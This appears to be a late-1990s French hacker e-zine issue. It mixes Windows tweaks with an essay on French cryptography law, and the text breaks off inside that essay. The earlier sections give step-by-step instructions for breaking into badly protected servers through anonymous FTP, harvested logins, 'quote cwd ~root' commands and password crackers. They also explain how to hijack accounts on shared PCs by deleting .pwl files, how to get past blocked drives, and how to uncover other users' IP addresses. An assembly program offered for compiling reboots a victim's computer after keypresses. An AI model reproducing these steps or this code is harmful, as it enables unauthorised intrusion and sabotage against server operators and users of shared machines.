1/ Hacker un site par ftp (autres
solutions que celles proposées dans les 2 précédentes)
2/ Astuces Windows
3/ Astuces de hacking entre autres
4/ Cryptologie
5/ Dissection d'un encrypteur (programmation en C)
6/ Savoir se protéger des commandes Netbios et
des intrusions
Bon prenons 3 cas. Le premier cas, le serveur est très mal protégé. Le second cas, le serveur est moyennemen protégé. Et puis un autre cas, celui de la page perso.
1er cas: Pour vérifier si un serveur est oui ou
non bien protégé, il faut tester quelques failles qui pourraient
exister dans ce système. Alors on va prendre comme exemple, un url
exemple, www.serveur.com. donc vous voulez hacker www.serveur.com, alors
vous aller taper: www.serveur.com/stats, il se peut que celà n'aboutisse
à rien, mais si ça marche alors vous pourvez vous dire, à
moins qu'il y ait un accès restreint, que ce site est relativement
pas très bien protégé.
Autre vérification, ftp://ftp.serveur.com, si on vous autorise
un accès à ce lien en anonyme, vérifié s'il
n'est pas restreint. si ce n'est pas le cas celà veut dire que vous
pouvez rentrez par Ws_FTP sur ce site en anonyme.
Donc vous y allez, comme ci-dessous en images. (Ici c'est un exemple
avec club-internet).
Bon... Maintenant vous entrez comme login dans Profile Name et dans
User ID celui d'un des webmasters du serveur. Comment avoir leurs logins:
soit dans le fichier etc/passwd ou en faisant un traçage avec WS_PING
PRO PACK (allez sur: http://www.ipswitch.com
pour le télécharger).
Donc vous allez dans info et vous tracez le site. Ainsi pour ne pas
porter préjudice à club-internet je trace www.serveur .com,
et j'ai:
Donc on a comme logins: "sarver, cpio laurent". Vous avez presque toutes les chances que ces logins marchent. Bon ensuite vous rentrez en anonyme par Ws_FTP avec ces logins, comme indiqué plus haut. Si il est mal protégé vous pourrez foutre votre merde.
2e cas: Bon là il faudra utiliser un peu plus du
DOS... Mais sachez que ça sera pas facile. Bon... La base est la
même, sauf que cette fois-ci vous devrez peut-être user d'un
crackpass pour ftp (tel que "VcrackFTP"). Ou encore d'une commande sous
DOS; Explications:
Sous Dos tapez: ftp
Vous voyez apparaître des commandes DOS
et vous êtes dans le répertoire ftp.
Tapez: open www.serveur.com
Tapez: quote user ftp
Tapez: quote cwd ~root (vous voyez *please
login user and pass).
Tapez: quote pass ftp
Voilà, si le serveur n'est pas protégé, vous êtes dessus!!
Bon il y a des chances que celà ne marche pas...
Autre cas: Bon il existe que sur certains serveurs (par exemple Multimania), en tapant après l'adress du site "etc", vous tombiez sur un répertoire passwd, bien entendu crypté ou interdit. Si vous arrivez à les décrypter le tour et joué, mais... BONNE CHANCE. Vous pouvez aussi utiliser des crackpass ftp, ça a assez de chances de marcher... mais il faut bien connaitre sa cible, de telle sorte a avoir un max d'informations sur elle.
AIDE: sur de nombreux serveurs il faut mettre l'adresse e-mail comme password.
AUTRE ASTUCE :Voilà... Bon avec
tout ça et des cibles faciles vous y serez instantanément...
autre astuce TRES utile. faire des commandes Netbios, pour celà
allez voir l'issue N° 3 des HACKER2020, mais prenez comme cible l'IP
du serveur.
- Fichiers pwl: si vous regardez bien dans le répertoire C:\WINDOWS\ vous apercevrez des fichiers .pwl. A quoi correspondent-ils? Ben en réalité ils correspondent aux passwords des personnes qui ont des sessions. donc si vous désirez être le seul qui puisse aller sur la bécane à papa, vous effacez le fichier pwl, en notant bien le nom d'utilisateur qu'il y a avant. Vous redamerrez l'ordinateur sous une session différente et vous tapez le nom d'user noté. On vous demandera de saisir un nouveau mot de passe. Idéal pour les pc dans les bibliothèques ou au bahut. Ensuite vous restreignez l'accès dans la session "annulée"de telle sorte à ce que personne n'aille virer les fichiers .pwl.
- Accéder aux lecteurs d'accès
restreints:
Dans
certains lieux (lycée; bibliothèque; entreprise; expo; etc...)
qui présentent Internet, l'accès aux lecteurs est souvent
bloqué (souvent pour de bonnes raisons). Rien de plus simple pour
y accéder, il vous suffit, dans le Browser, de taper dans le champs
destiné aux adresses URL le nom du lecteur que vous voulez utiliser.
Généralement
c'est:
A:/ pour le
lecteur de disquettes.
C:/ pour le
disque dur.
D:/ pour le
CD-ROM.
Et l'url à mettre est (par exemple pour
le lecteur D:\) :
file:///D|/
- Ecran Windows: Ca
vous la coupe, ça, non ? Un écran caché que vous n'auriez
pas vu ? Que vous ne soupçonniez même pas ? Bah, ça
arrive ! Remarquez, c'est pas qu'il soit bien utile cet écran, c'est
plutôt pour assouvir la mégalomanie des développeurs
de Microsoft. Enfin, soyez pas déçus, j'vous aurais prévenu.
Tiens, si vous avez une carte son, c'est le moment de pousser à
fond le volume des vos baffles! Héhéhé !!
1. Créez un dossier sur
le bureau et nommez le "New Folder"
2. renommer le "and now, the moment
you've all been waiting for"
3. renommer le "we proudly present
for your viewing pleasure"
4. renommer le "The Microsoft Windows
95 Product Team!"
5. double-cliquez dessus.
- Menu démarrer:
Tout d'abord, je dois vous dire que changer
les noms du menu démarrer et de ses éléments n'est
pas une opération dénuée de risques et qu'il vous
faudra un éditeur héxadécimal sous dos.
Faites une copie du fichier "explorer.exe"
qui se trouve dans votre répertoire "Windows" dans un autre répertoire.
Ainsi, si jamais vous rencontriez un problème après la manip,
vous n'aurez qu'à remplacer celui qui se trouve dans le répertoire
"Windows" par celui-ci.
Redémarrez votre ordinateur
en mode Dos et lancez votre éditeur héxadécimal. Ouvrez
avec ce dernier le fichier "explorer.exe" qui se trouve dans le votre répertoire
"Windows".
Attention : dans les lignes qui
vont suivre, il vous sera demandé de modifier le programme "Explorer.exe".
Vous verrez que, par exemple, le texte du bouton démarrer ne se
présentera pas sous la forme "démarrer" mais sous la forme
"d.é.m.a.r.r.e.r". Vous ne devrez surtout pas effacer les espaces
entre les lettres et le mot qui le remplacera ne devra pas avoir plus de
lettres que le mot d'origine (Oui je sais, c'est compliqué).
Si vous voulez que le bouton "démarrer"
soit le bouton "salut", vous remplacerez "d.é.m.a.r.r.e.z" par "s.a.l.u.t.
. . ".
* Pour modifier le bouton démarrer,
allez au secteur "2D59E".
* Pour modifier les éléments
du menu démarrer, allez au secteur "2ADE0", vous y reconnaîtrez
les différents éléments.
Voilà, c'est enfin fini,
si en redémarrant vous obtenez un message d'erreur, redémarrez
sous dos et remplacez "Explore.exe" du répertoire "Windows" par
celui que vous aviez sauvegardé (si vous avez oublié de le
faire, vous êtes dans la m...).
- Menu Démarrer: Windows
95 fait parfois preuve de (très) peu de logique, en effet il faut
d'abord appuyer sur le bouton Démarrer pour arrêter son PC.
Pour remédier à cela, vous pouvez créer un raccourci
vers :
"C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows"
et le placer par exemple sur le
bureau ou où vous voulez ...
- Fichiers BMP: Vous
pouvez demander au système d'afficher comme icône d'un fichier
BMP l'image réduite qu'il contient.
Lancez regedit, puis ouvrez le
dossier "HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon".
Cliquez sur l'entrée "default"
et modifiez sa valeur par "%1"
- Délai d'affichage du menu Démarrer: Si
vous trouvez l'affichage des différents niveaux du menu Démarrer
trop lent, vous pouvez l'accélérer. Pour cela, il faut lancer
Regedit. Puis ouvrir le dossier "HKEY_CURRENT_USER\Control Panel\desktop".
Cherchez dans la fenêtre de droite une entrée nommée
MenuShowDelay" ; si elle n'existe pas, créez la à partir
du menu édition, "Nouveau\Valeur Chaîne". Faites ensuite un
double clic sur cette entrée et tapez une valeur comprise entre
1 et 10 (1 permet d'obtenir la vitesse la + élevée).
- Changer les icônes ou le nom de la corbeille ou du poste de travail: Lancez regedit, puis allez dans le répertoire "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}", cliquez deux fois dessus de façon à déplier la ligne "\default-icon". Il y a alors 3 noms : "(Default)", "Empty", "Full". A droite figure les chemins d'accès où se trouvent les icônes. En l'occurrence "C:\Windows\system\Shell32.dll,32". Si votre fichier d'icône est un fichier "*.ico", inscrivez simplement son chemin d'accès en double cliquant sur la valeur. Si c'est un fichier "*.dll", inscrivez aussi son chemin d'accès mais faites le suivre d'une virgule puis du N° de l'icône. Pour connaître le N° d'icône, depuis la fenêtre propriété d'un programme, cliquez sur l'onglet raccourci puis sur le bouton changer d'icône. Vous visualiserez les icônes de tous les fichiers "*.dll". Le N° de l'icône correspond à l'ordre des icônes en partant de zéro depuis la gauche. Pour changer le nom de la corbeille, cliquez sur le répertoire indiqué plus haut et modifier le texte "Corbeille" par ce que vous voulez en double cliquant dessus.
Idem pour le poste de travail, mais
l'icône se trouve dans le dossier "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
et le nom à modifier est "Poste de travail".
- L'ordinateur reboot dès que plus de 5 touches sont pressées:
(ex : Monsieur Pierre Pipol , specialiste
des ovnis, veux ecrire "extraterrestre" ben juste apres le "a" de "extraterrestre"
et sans prevenir son ordinateur reboot tout seul comme un grand !!!)
Je vous propose le programme suivant
(que j'ai trouve sur Internet) ... mais il faut le compiler !!!
.model tiny
.code
org 100h
INSTALL:
MOV AX,3509h
INT 21h
MOV [BXREG],BX
MOV [ESREG],ES
MOV AH,25h
MOV DX,offset NEW_INT
INT 21h
MOV DX,offset EOP
INT 27h
NEW_INT: PUSHF
INC WORD PTR CS:[COUNTER]
CMP WORD PTR CS:[COUNTER],20
JB NOCOUNTER
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH ES
PUSH DS
PUSH SS
PUSH SI
PUSH DI
JMP SKIP
NOCOUNTER: JMP ADIOS
SKIP:
CALL REBOOT
MOV WORD PTR CS:[COUNTER],0
POP DI
POP SI
POP SS
POP DS
POP ES
POP CX
POP BX
POP AX
ADIOS:
POPF
DB 0EAh
BXREG dw ?
ESREG dw ?
COUNTER dw 0
REBOOT: MOV AH,2
XOR BH,BH
XOR DX,DX
INT 10h
MOV AH,9
MOV CX,2000
MOV AL,' '
MOV BL,7
INT 10h
JMP FAR 0FFFFh:0
EOP:
END START
- Connaître l'adresse IP d'un connecté sur IRC ou ICQ:
Ce n'est pas très difficile, sur IRC, vous
tapez la commande /dns pseudo et vous allez voir dans "Status". Si le connecté
a omis de cacher celle ci, elle apparaîtra, si ce n'est pas le cas
vous aurez son nom de serveur par ex: PPP-215-48-infonie.fr, pas de panique!!
ouvrez une fenêtre MS-DOS et tapez la commande suivante :
ping -a PPP-215-48-infonie.fr
vous verrez apparaître son adresse IP.
Sur ICQ, vous allez dans votre liste de contacts,
vous cliquez sur le pseudo puis sur info, si l'utilisateur a caché
son IP vous verrez apparaître dans le champs prévu à
cet effet N/A, pas de panique!! Laissez la fenêtre "info" ouverte,
mettez votre ICQ sur "off line" fermez la fenêtre "info" recliquez
sur le pseudo réouvrez la fenêtre "info" et là, comme
par magie, son IP devient visible. Il existe aussi des crackers ou des
sniffers pour icq qui ont la même fonction.
La réglementation de la cryptologie
Les médias le répètent à
satiété : l'Internet n'est pas sûr. Les messages peuvent
être interceptés ou
même falsifiés. Pourtant, il y a
un remède technique imparable : la cryptologie. Mais on se heurte
au
problème de sa réglementation.
La situation actuelle
La France, patrie des Droits de l'homme, présente
la particularité curieuse d'avoir une des
réglementations les plus restrictives
du monde quant au droit de ses citoyens à protéger leurs
secrets.
Dans la plupart des autres pays démocratiques,
vous avez parfaitement le droit d'écrire votre journal
intime avec un code connu de vous seul, de chiffrer
par tout moyen à votre convenance le contenu
de vos fichiers d'ordinateurs, de mettre au point
avec vos correspondants privilégiés des conventions
secrètes qui font qu'eux seuls pourront
vous lire, et même de brouiller vos conversations
téléphoniques avec les moyens matériels
ou logiciels de votre choix. Le droit au secret, celui de
garder pour soi ce qu'on n'a pas décidé
de porter à la connaissance du public, y est considéré
comme fondamental, et chacun peut l'assurer comme
il l'entend. Evidemment, si une autorité
judiciaire établit que les secrets en
question peuvent constituer des pièces à conviction, elle
peut
mettre l'intéressé en demeure de
lui communiquer leur traduction en clair, sous peine des sanctions
prévues en cas de refus.
En France, non. Il est, au départ, interdit
d'écrire ou de communiquer quoi que ce soit par un moyen
secret, à moins que ce moyen ait été
expressément autorisé par l'Etat.
Vous n'avez pas le droit de brouiller vos conversations
par téléphone sans fil ; or, n'importe qui peut
très facilement les intercepter - c'est,
bien sûr, interdit, mais les poursuites sont rarissimes, alors que
le matériel pour le faire se vend très
bien, et très légalement. Vous n'avez pas le droit de transmettre
votre numéro de carte bancaire pour un
télépaiement autrement qu'en clair ; or, un intrus peut le
capter et tenter de s'en servir à votre
place. Vous n'avez pas le droit de chiffrer, par exemple, vos
mots de passe d'accès à votre courrier
électronique conservés sur votre ordinateur ; or, il existe
des
logiciels "chevaux de Troie" qui les communiquent
à des pirates quand vous vous connectez sur
l'Internet, et vous en avez peut-être déjà
téléchargé sans le savoir. Vous n'avez même
pas le droit de
conserver votre journal, votre agenda, votre
carnet d'adresses, le manuscrit de votre roman, vos
souvenirs amoureux, vos fantasmes secrets, votre
correspondance la plus intime, les notes que vous
inspirent votre dernière séance
chez le psychanalyste, quoi que ce soit en somme, sous une forme
que vous seul pourrez relire. Et si vous êtes
avocat ou médecin, vous n'avez pas le droit de rendre
même les dossiers relevant du secret professionnel
illisibles aux yeux des espions qui auraient réussi à
se les procurer.
Ou, plus exactement, vous pouvez faire tout ou
partie de cela à condition d'y être expressément
autorisé par un organisme spécialisé,
le Service central de sécurité des systèmes d'information
(SCSSI), soit parce que vous en faites personnellement
la demande (cela suppose le dépôt d'un
dossier qui déclenche une enquête
policière, et l'issue est incertaine), soit parce que vous vous
adressez à un fournisseur dont le produit
a été autorisé une fois pour toutes à l'usage
général.
En pratique, le SCSSI autorise les procédés
dès lors qu'il estime pouvoir les briser. Cela permet
quand même de se protéger efficacement
contre les indiscrets ordinaires, qui sont très loin de
disposer des mêmes moyens qu'un service
national du chiffre. Si, donc, vous n'avez pas de secrets
pour le SCSSI... ou ses collègues étrangers,
le moyen le plus simple de vous protéger en toute
légalité est d'avoir recours à
un moyen autorisé pour l'utilisation générale. Cependant,
ces derniers
sont très peu nombreux, ou alors très
discrets sur leur autorisation, en particulier sur sa durée qui
ne
peut excéder cinq ans. (A vrai dire, je
n'en connais pas d'autre que le mien qui fournisse
spontanément ces informations.)
Pourtant, il ne manque pas de logiciels qui chiffrent
les données. Citons, par exemple, Netscape et
Internet Explorer, qui permettent des accès
sécurisés à certains serveurs, divers utilitaires
de
compression avec une option de chiffrement, et
même les banals Word et Excel de Microsoft, dont
l'option de sauvegarde sous mot de passe constitue
bel et bien un "moyen de cryptologie" aux yeux
de la loi ! Il en résulte, soit que ces
logiciels ont été expressément autorisés par
le SCSSI (et dans ce
cas, on aimerait connaître les références
de leur autorisation et surtout la date à partir de laquelle leur
usage n'est plus autorisé), soit que leur
fourniture et leur utilisation est passible de 10 000 F
d'amende par infraction, ce qui permettrait de
renflouer sérieusement les finances de l'Etat... En fait, il
semble bien que la loi soit allègrement
violée, avec l'accord tacite des pouvoirs publics. Le parquet
exerce avec dilligence son droit à...
ne pas poursuivre. Et l'on imagine à peine le désordre que
cela
ferait si le fournisseur d'un moyen autorisé
s'avisait de demander en référé qu'on fasse cesser,
sous
astreinte, la commercialisation et même
l'usage de moyens illégaux peu ou prou concurrents du sien.
Telle qu'elle est à l'heure actuelle, la
loi présente manifestement plus d'inconvénients que d'avantages.
Les autorités ont fini par s'en apercevoir,
et proposent un projet tendant à l'aménager. Seulement,
cette fois-ci, la situation a changé :
on ne peut plus se contenter d'un discret débat de spécialistes.
Le
grand public a pris conscience, par le biais
du phénomène de l'Internet, de l'importance de l'enjeu, et
doit participer à la réflexion,
somme toute assez fondamentale en démocratie, sur les rapports entre
le citoyen qui veut préserver ses secrets
et l'administration qui aimerait parfois les connaître.
Le problème : les abus de la cryptologie
Si la France interdit déjà pratiquement
la cryptologie à ses citoyens, si d'autres pays démocratiques
(l'Union Européenne et chacun de ses pays
membres, de même que les Etats-Unis et sans doute
d'autres) envisagent des modalités de
réglementation, ce n'est évidemment pas par pure tyrannie.
Il y
a bien un réel problème.
Les progrès de la cryptologie permettent
désormais à chacun de prendre des mesures qui rendent
toute tentative de décryptage parfaitement
futile. Sur le plan technique, la partie est définitivement
jouée : le bouclier a gagné face
au glaive. Il est dorénavant possible de protéger ses secrets
de
manière inviolable, et tout nouveau progrès
de l'informatique ne fera qu'accroître l'avantage du
chiffreur sur le décrypteur.
Cela implique que la Mafia, par exemple, peut
conserver sa comptabilité et ses fichiers clients et
fournisseurs sous une forme que personne, pas
même les meilleurs spécialistes des meilleurs services
d'Etat, ne peut lire sans la clé. Les
trafiquants de drogue peuvent prendre des commandes sans
risque. Les terroristes peuvent conspirer par
téléphone ou par télématique selon des moyens
qui font
de toute interception une perte de temps. Et
cela, évidemment, n'est pas réjouissant.
Seulement, que faire ? A moins d'interdire l'informatique,
on ne peut pas priver les criminels des
moyens techniques nécessaires. En fait,
n'importe quel boy-scout avec un PC même d'occasion
dispose du matériel suffisant. L'Union
soviétique avait essayé de réglementer l'accès
à l'ordinateur
(ainsi qu'à tout moyen de communication,
jusqu'aux photocopieuses) ; ce fut un élément décisif
de sa
perte à cause des conséquences
évidentes de marginalisation technologique. Personne ne peut
proposer d'aller dans ce sens.
Reste donc à proposer des nouvelles mesures,
plus raisonnables, de réglementation de la cryptologie
elle-même. C'est le but du projet de loi
modifiant l'article 28 de la loi du 29 décembre 1990 sur les
télécommunications, adopté
par le Conseil des ministres du 3 avril 1996, modifié et adopté
par
l'Assemblée nationale, le 10 mai 1996.
Le projet de loi
Le projet rend enfin libre l'usage de la cryptologie
dans un certain nombre de cas. (Notons que c'est
la première fois que le mot "libre" apparaît
dans un texte officiel français sur la cryptologie. On
imagine la douloureuse révolution culturelle
que cela a dû impliquer dans les services concernés.)
Cependant, il ne faut pas se faire d'illusions
sur la portée pratique de ce changement de vocabulaire :
si jadis, la cryptologie était interdite,
sauf quand elle était autorisée, maintenant, elle est libre,
sauf
quand elle est soumise à autorisation.
Il n'en reste pas moins qu'il y a comme une amorce de
changement d'état d'esprit, ainsi que
quelques réels progrès.
La cryptologie sans confidentialité
Liberté, d'abord, pour l'usage de la cryptologie
à des fins d'authentification et de contrôle d'intégrité,
mais non de confidentialité : le régime
passablement irréaliste qui exigeait théoriquement une
déclaration préalable à
chaque application d'une fonction de hachage telle que SHA ou MD5 (voire
d'un banal checksum !) est supprimé. Désormais,
on voit mal ce qui s'opposerait à une vérification
par PGP de la signature d'un correspondant étranger
- la détention de PGP, comme de tout autre
moyen de cryptologie, n'est pas interdite, même
si son usage à des fins de confidentialité le reste.
(Attention, toutefois, à prendre soin
de le télécharger à partir d'un serveur situé
dans l'Union
européenne si le projet de loi est adopté
- sinon, vous risquez la prison pour importation !)
Les tiers de confiance
Ensuite, l'usage de la cryptologie pour assurer
la confidentialité sera libre si "le moyen ou la
prestation assure des fonctions de confidentialité
et n'utilise que des conventions secrètes gérées
selon les procédures et par un organisme
agréé".
C'est cette disposition, les fameux "tiers de
confiance" qui constitue la principale innovation du projet
de loi. (L'expression ne figure pas dans le texte
du projet de loi, mais elle est d'un usage courant, et
elle figure dans l'exposé des motifs,
ansi que dans la fiche d'explications du ministère délégué
à la
poste, aux télécommunications et
à l'espace.) Notons que la France est le premier pays au monde à
mettre en place ce genre de mécanisme,
qui a fait l'objet de très vifs débats, et dont le caractère
obligatoire a jusqu'à présent été
écarté partout ailleurs.
Il s'agit d'organismes (privés ou publics
- en pratique, on semble s'orienter vers, par exemple, le GIE
CB, groupement d'entreprises bancaires de droit
privé qui gère les cartes de crédit) agréés
par
l'Etat, et chargés de gérer les
clés secrètes des usagers. Ils sont tenus de conserver les
clés, et de les
remettre en cas de besoin à la police
ou à la justice. En dehors de ce cas, ils sont tenus au secret
professionnel.
Si leur principe peut paraître intéressant, il soulève tout de même des interrogations.
D'abord, dans quelles modalités exactes
ces clés pourront-elles être communiquées, et au juste
à
qui? Le projet de loi évoque deux cadres
: la loi no. 91-646 du 10 juillet 1991 relative au secret des
correspondances émises par la voie des
télécommunications, d'une part, les chapitres premier et
II
du titre II du livre premier du Code de procédure
pénale, de l'autre.
Les écoutes des télécommunications
La loi no. 91-646 du 10 juillet 1991 fixe des
cadres très contraignants aux interceptions de
télécommunications, qui ne peuvent
être autorisées que dans deux cas :
les écoutes dites
"judiciaires" qui ne peuvent être ordonnées que par le juge
d'instruction, et
seulement si la peine
encourue est supérieure ou égale à deux ans d'emprisonnement,
et si les
nécessités
de l'information l'exigent (articles 100 à 100-7 du Code de procédure
pénale). Ni
le parquet, ni a fortiori
un officier de police judiciaire agissant de sa propre initiative ne
peuvent les mettre en
oeuvre,
les écoutes dites
"administratives" qui ne peuvent être ordonnées, à
titre exceptionnel et pour
des motifs graves dont
la loi donne la liste, que par trois personnes en France : le Premier
ministre ou l'une des
deux personnes spécialement déléguées par lui.
De plus, elles sont
surveillées par
une autorité administrative indépendante instituée
à cet effet, la Commission
nationale de contrôle
des interceptions de sécurité (CNCIS).
Bref, l'interception des télécommunications
à l'insu des intéressés est une affaire grave, et
pour
laquelle le législateur, après
quelques embarrassantes condamnations de la France par la Cour
Européenne des Droits de l'Homme, s'est
entouré de garanties sérieuses. La communication de clés
dans ce cadre semble, en principe, logique.
Cependant, il faut bien reconnaître que
les garanties ne semblent pas fonctionner de manière bien
satisfaisante. Les écoutes illégales
sont, de fait, très nombreuses (la CNCIS avance le chiffre de plus
de 100 000 par an) ; elles sont surtout le fait
de personnes privées, mais des bavures de la part de
fonctionnaires se produisent parfois - l'affaire
Schuller / Maréchal en a fourni un exemple, et on peut
craindre qu'il y en ait bien plus qui ne sont
jamais portés à la connaissance du public. C'est bien là
une des justifications au recours à la
cryptologie, qui devient alliée de la CNCIS.
Les perquisitions dans le cadre du Code de procédure pénale
Les références au Code de procédure
pénale posent quelques problèmes. Curieusement, il n'est
pas
question dans le projet de loi de ses articles
92 à 100-7, qui parlent des transports, perquisitions,
saisies et interceptions de télécommunications
réalisés par le magistrat instructeur. Les références
sont les articles 53 à 74, qui traitent
des crimes et délits flagrants, et 75 à 78, qui régissent
les
enquêtes préliminaires. Dans les
deux cas, l'officier de police judiciaire peut agir d'office. Or, les
garanties voulues par le législateur pour
des perquisitions dans ce cadre risquent d'être inopérantes,
dans la mesure où ce n'est pas le domicile
de l'intéressé qui est perquisitionné.
En principe, toute perquisition doit avoir lieu
en présence de la personne chez qui on perquisitionne;
(article 57 du CPP). Dans le cas d'une entreprise
de presse ou de communication audiovisuelle, elle
ne peut être effectuée que par un
magistrat (art. 56-2) ; s'il s'agit du domicile ou du cabinet d'un
avocat, elle doit, en plus, se faire en présence
du bâtonnier ou de son délégué, et s'il s'agit
du cabinet
d'un médecin, d'un notaire, d'un avoué
ou d'un huissier, en présence d'un représentant de l'ordre
concerné (art. 56-1).
Mieux, dans le cadre d'une enquête préliminaire,
c'est-à-dire s'il n'y a pas flagrance et si la personne
n'est pas mise en examen, une perquisition chez
elle suppose son accord écrit préalable (article 75)
qu'elle n'est évidemment pas tenue d'accorder.
Il y a bien une exception dans le cadre de la lutte
contre le terrorisme, mais elle suppose une décision
d'un juge sur requête du procureur
(article 706-24).
La rédaction actuelle du projet pourrait
faire penser qu'un officier de police judiciaire, procédant
d'office à une enquête préliminaire
ou constatant le caractère flagrant d'un délit ou d'un crime,
puisse
obtenir, sans aucun contrôle d'un magistrat,
la communication de toutes les clés secrètes qu'il veut,
sans que les intéressés en soient
jamais avertis.
En effet, on voit mal pourquoi le tiers de confiance
chez qui s'effectue la perquisition refuserait son
autorisation, même écrite ! Son
activité (dont on peut supposer qu'elle puisse être lucrative)
est
subordonnée à une autorisation
de l'administration : il a tout intérêt à entretenir
de bons rapports
avec elle... Peut-il se permettre de déclarer
solennellement, éventuellement moyennant des pénalités
contractuelles considérables en cas de
manquement, qu'il ne remettra jamais une clé sauf s'il y est
contraint par la loi, qu'il refusera son autorisation
s'il ne s'agit que d'une simple enquête préliminaire,
et qu'il informera immédiatement son client
de toute demande de communication dans la mesure où
la loi ne le lui interdit pas ? Cela constituerait
certainement un argument commercial de première
importance, parfaitement en accord avec la loi,
mais ce tiers qui serait réellement de confiance
aurait-il la moindre chance d'obtenir l'agrément
?
On risque d'être très loin du luxe
de précautions normalement prévues pour l'interception des
communications à l'insu de l'intéressé,
et dont on sait qu'elles ne sont même pas suffisantes. Il se peut
que ce soit en effet là ce que veulent
les auteurs du projet, mais dans ce cas, il conviendrait à tout
le
moins de le préciser clairement, et que
le Parlement en discute. Car à quel usage légal pourrait
bien
être destinée la connaissance de
ces clés, sinon à l'examen de documents ou de messages auxquels
l'autorité requérante a légalement
accès ?
Les régimes contrôlés
Seul l'usage de la cryptologie est qualifié
de "libre" par le projet, et seulement dans les deux cas
mentionnés : celui où elle n'assure
pas de confidentialité, et celui où l'on a recours aux tiers
de
confiance. Pour le reste, le régime ne
change guère, si ce n'est que les décrets d'application devraient
apporter des allégements des formalités,
tout en multipliant les cas de figure avec quelques
nouveautés intéressantes. Comme
par le passé, le projet prévoit deux modalités de
contrôle : la
déclaration et l'autorisation.
Les régimes de déclaration
La première s'applique à la fourniture,
l'importation d'un pays n'appartenant pas à l'Union
européenne, et l'exportation de moyens
de cryptologie n'assurant pas la confidentialité. L'usage, lui,
est libre ; en revanche, l'obligation de déclaration
d'importation d'un pays n'appartenant pas à l'Union
européenne est nouvelle.
De plus, le décret d'application pourra
substituer la déclaration à l'autorisation "pour les opérations
portant sur des moyens ou des prestations de
cryptologie, dont les caractéristiques techniques ou les
conditions d'utilisation, tout en justifiant
[...] un suivi particulier, n'exigent pas l'autorisation préalable
de ces opérations". On attend les détails,
car il est difficile de voir de quoi il peut être question.
Les régimes simplifiés
Il est prévu "un régime simplifié
de déclaration ou d'autorisation pour certains types de moyens ou
de
prestations ou pour certaines catégories
d'utilisateurs". Logiquement, cela devrait concerner
notamment les banques, qui se servent depuis
longtemps (avec l'autorisation du gouvernement) de
mécanismes de transactions sécurisées,
depuis le banal distributeur automatique de billets jusqu'aux
transferts de fonds internationaux. Mais cela
concerne certainement aussi les services de l'Etat,
armée, affaires étrangères,
police, etc, qui sont comme tout le monde soumises à la loi, et
qui ont
évidemment des besoins particuliers.
A ces catégories un peu privilégiées
d'utilisateurs, on aimerait en ajouter au moins deux autres : les
avocats, dans le cadre de la correspondance avec
leurs clients, et les médecins. Leur secret
professionnel est absolu ; il serait logique
d'autoriser qu'il soit garanti par tout moyen technique.
Un régime de quasi-liberté pour la cryptologie sans danger
Le décret d'application établira
"la dispense de toute formalité préalable pour les opérations
portant
sur des moyens ou des prestations de cryptologie,
dont les caractéristiques techniques ou les
conditions d'utilisation sont telles que ces
opérations ne sont pas susceptibles de porter atteinte aux
intérêts" "de la défense
nationale et de la sécurité intérieure ou extérieure
de l'Etat".
On peut espérer que cette disposition permettra
enfin d'autoriser, une fois pour toutes, les procédés
de cryptologie passablement ridicules qui vous
protègent contre l'indiscrétion de votre petite soeur si
elle n'est pas très futée, mais
non contre un cryptologue un tant soit peu compétent. La fourniture
de
Word et d'Excel ne constituera plus une contravention
de 5e classe passible de 10 000 F d'amende
par infraction, ce qui devrait rassurer Microsoft
France.
Evidemment, on attend avec curiosité les
critères qui détermineront qu'un procédé n'est
pas
"susceptible de porter atteinte aux intérêts
de la défense nationale et de la sécurité intérieure
ou
extérieure de l'Etat". Logiquement, il
faut s'attendre à une limite au nombre de bits d'entropie de la
clé. La valeur précise de cette
limite sera très intéressante. Comment le SCSSI situe-t-il
lui-même
ses capacités par rapport, disons, à
celles de la NSA américaine ? Les Français feront-ils mieux
ou
moins bien que les 40 bits des Etats-Unis, cassés
en une semaine par Damien Doligez ?
Le régime ordinaire d'autorisation
En dehors de ces cas, le régime continuera
à être celui de l'autorisation préalable. Compte tenu
de la
multiplicité des cas particuliers qui
ont été prévus, il y a fort à parier qu'en
fait, si la demande ne peut
pas se rattacher à l'un d'entre eux, elle
sera tout simplement rejetée. Il ne faut pas s'attendre à
ce que
PGP soit autorisé pour le citoyen ordinaire.
La référence à l'Europe
Le projet de loi mentionne à plusieurs
reprises la notion d'importation d'un pays n'appartenant pas à
l'Union européenne (et non "Communauté
européenne", comme le texte le dit systématiquement à
tort - la Communauté n'a pas de compétence
pour les questions de sécurité, elle reste
essentiellement économique ; depuis le
Traité de Maastricht, le terme d'"Union européenne" désigne
une entité plus ambitieuse englobant,
notamment, une politique commune en matière de défense,
d'affaires étrangères, de sécurité,
d'immigration, de citoyenneté, etc).
Ceci suscite des interrogations : s'il est vrai
que des réflexions ont été menées au sein des
instances
européennes sur une harmonisation de la
réglementation de la cryptologie, et en particulier sur les
tiers de confiance, elle n'ont pas, que l'on
sache, abouti à une décision. Il n'est nullement évident
que
l'ensemble des membres de l'Union se rangent
aux thèses passablement maximalistes françaises ; à
l'heure actuelle, seule la Belgique semble vouloir
restreindre la liberté de la cryptologie, et toute
évolution dans ce sens constituerait un
changement de cap majeur au moins dans les nations
d'Europe du Nord (Suède, Finlande, Danemark,
Pays-Bas, Royaume-Uni, Irlande)
traditionnellement jalouses de libertés
individuelles, auxquels on peut ajouter celles (Allemagne,
Autriche, Italie, Espagne, Portugal, Grèce)
dont l'expérience assez récente d'une dictature tendrait
en
principe à les rendre méfiantes
vis-à-vis d'un contrôle excessif de la part du pouvoir politique.
Les sanctions
Le texte prévoit une série de sanctions,
en général bien plus lourdes que par le passé. Le
caractère
"libéral" des nouvelles dispositions reste
limité.
Abus à des fins délictueuses ou criminelles
D'abord, une surprise bienvenue : le simple usage
d'un moyen de cryptologie non autorisé ne semble
plus punissable, à moins qu'un décret
ne le qualifie de contravention et prévoie une peine d'amende.
En revanche, s'il a lieu "en vue de faciliter
la préparation ou la commission d'un crime ou d'un délit",
l'usage, la fourniture, l'importation d'un pays
n'appartenant pas à l'Union européenne, et l'exportation
sont passibles de trois ans de prison et de 500
000 F d'amende.
Cela semble conforme au bon sens : ce n'est évidemment
pas la cryptographie en tant que telle qui
pose problème, mais bien son abus à
